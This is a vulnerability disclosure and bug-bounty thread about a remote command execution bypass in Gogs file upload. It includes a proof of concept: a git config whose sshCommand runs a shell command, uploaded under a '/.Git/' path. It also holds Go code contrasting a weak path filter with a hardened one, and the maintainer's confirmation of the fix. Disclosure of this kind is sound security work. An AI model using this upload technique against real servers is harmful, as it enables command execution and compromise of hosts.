Bypass to Remote Command Execution in uploading repository file in gogs/gogs

Valid

Reported on

Jun 6th 2022


Description

I found a bypass for CVE-2022-0415 and the previous fixes. In the fix for CVE-2022-0415, gogs filters /.git/ using strings.HasSuffix and strings.Contains. However, using /.Git/ bypasses this and the upload succeeds.

Proof of Concept

Create a repository in Gogs and upload a file named config to the repository through the web page:

[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
    logallrefupdates = true
    ignorecase = true
    precomposeunicode = true
    sshCommand = echo pwnned > /tmp/poc
[remote "origin"]
    url = git@github.com:torvalds/linux.git
    fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
    remote = origin
    merge = refs/heads/master

Intercept the HTTP POST form submission request and set the parameter tree_path=/.Git/ in the request body. A file containing the text pwnned is then created at /tmp/poc.
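The description above says the earlier fix filtered the literal string "/.git" with strings.HasSuffix and strings.Contains, and the PoC shows that a differently cased "/.Git/" slips past it; the maintainer's later comment explains why that matters on case-insensitive file systems. The following is an added illustration, not gogs' own code or its actual fix (the real filter and the patched version in commit 15d0d6 may differ): weakGitPathCheck reproduces the case-sensitive pattern the report describes, and hardenedGitPathCheck normalises the path (slashes, "." and ".." segments) and compares each segment to ".git" case-insensitively, so the check no longer depends on how the host file system treats case. The sample tree_path values in main are constructed.

```go
package main

import (
	"fmt"
	"path"
	"strings"
)

// weakGitPathCheck is an added illustration (not gogs' code) of the kind of
// case-sensitive filter the report describes: strings.HasSuffix /
// strings.Contains on the literal "/.git". A tree_path of "/.Git/" passes it.
func weakGitPathCheck(treePath string) bool {
	return strings.HasSuffix(treePath, "/.git") ||
		strings.Contains(treePath, "/.git/")
}

// hardenedGitPathCheck is an added illustration (not the project's fix) of a
// normalise-then-compare check: backslashes become slashes, "." and ".."
// segments are resolved by path.Clean, and every remaining segment is compared
// to ".git" with strings.EqualFold. ".Git", ".GIT", "docs/../.git" and a bare
// ".git" are all rejected regardless of file-system case sensitivity, while
// ".gitignore" is still allowed because only whole segments are compared.
func hardenedGitPathCheck(treePath string) bool {
	cleaned := path.Clean("/" + strings.ReplaceAll(treePath, `\`, "/"))
	for _, seg := range strings.Split(cleaned, "/") {
		if strings.EqualFold(seg, ".git") {
			return true
		}
	}
	return false
}

func main() {
	// Constructed sample tree_path values, including the one from the report.
	samples := []string{"/.git/", "/.Git/", "docs/../.GIT/config", ".git", ".gitignore", "src/main.go"}
	for _, p := range samples {
		fmt.Printf("%-24q weak=%-5v hardened=%v\n", p, weakGitPathCheck(p), hardenedGitPathCheck(p))
	}
}
```

The point of normalising before comparing is that the check's decision must not depend on what the file system will later do with the name: on macOS or Windows ".Git" and ".git" are the same directory, so anything the server writes under one is read by git from the other.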

Video

Hosted in the GitHub repository https://github.com/cokeBeer/test under the name gogsbypass.mov

Impact

This vulnerability allows executing commands on the remote server and gaining a privileged user account, which leads to sensitive data exposure, identity theft, etc.

We are processing your report and will contact the gogs team within 24 hours. a year ago
cokebeer modified the report
a year ago
We have contacted a member of the gogs team and are waiting to hear back a year ago
gogs/gogs maintainer has acknowledged this report a year ago
Joe Chen
a year ago

Maintainer


Thanks for the report!

Could you confirm what systems are affected?

cokebeer
a year ago

Researcher


I tested with the latest version of the gogs docker images, so Linux is affected.

Joe Chen
a year ago

Maintainer


Can you record a video for the poc on Linux systems? We weren't able to reproduce it on Linux.

Joe Chen
a year ago

Maintainer


Though I can confirm Windows and macOS are affected because paths are case-insensitive.

cokebeer
a year ago

Researcher


Added the video file link in the report; download it to play. I think this way is faster than uploading to a video website, which always needs a check.

Joe Chen
a year ago

Maintainer


Thanks for the video!

We're still not able to reproduce it on Linux, where the .Git directory is simply treated as a regular content directory. In the PoC video, there is also no evidence showing that /tmp/poc is created during the recording.

Could you record a video starting from a fresh installation of a fresh pull of gogs/gogs?

cokebeer
a year ago

Researcher


It seems the problem doesn't come from the way I operate. The docker data dir is mounted on my macOS system and may share the case-insensitive feature.

cokebeer
a year ago

Researcher


So just exclude Linux. By the way, I found some bugs that are claimed to be fixed in gogs's changelog but actually still exist in the latest version. How can I get in contact without messing up the comments of this report?

Joe Chen
a year ago

Maintainer


Sounds good, marking as valid.

To file bug reports, please go to https://github.com/gogs/gogs/issues/new/choose

Joe Chen validated this vulnerability a year ago
cokebeer has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the gogs team. We will try again in 7 days. a year ago
We have sent a second fix follow up to the gogs team. We will try again in 10 days. a year ago
We have sent a third and final fix follow up to the gogs team. This report is now considered stale. a year ago
Joe Chen marked this as fixed in 0.12.11 with commit 15d0d6 9 months ago
Joe Chen has been awarded the fix bounty
This vulnerability has been assigned a CVE
Joe Chen published this vulnerability 9 months ago